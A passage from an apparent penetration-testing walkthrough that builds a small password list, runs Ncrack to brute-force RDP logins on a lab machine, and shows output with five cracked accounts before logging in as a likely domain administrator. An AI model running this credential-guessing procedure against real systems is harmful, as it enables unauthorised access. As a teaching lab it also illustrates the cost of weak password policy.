We also need a file (my.pwd) for the passwords; you can look on the internet for common passwords and wordlists.
vim my.pwd

somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1
At this point we run Ncrack against the 192.168.56.10 machine.
ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST
Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however, the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'
rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0
Ncrack finished.
We can see from the Ncrack results that all the gathered user names are valid, and we were also able to crack the login credentials because the accounts were using weak passwords. Four of the IT staff have some kind of logon restriction on the machine; the exception is hduchene, who might be the domain administrator. Let's find out: run the terminal server client from the Linux box (tsclient 192.168.56.10), use Hugh Duchene's credentials 'hduchene' 'passw0rd', and BINGO !!!
Final remarks. For the penetration testers: don't give up at the first hurdle; there's always another way to break in :-) . For the IT staff: the lack of a password policy enforcing complexity and strength led to a disaster.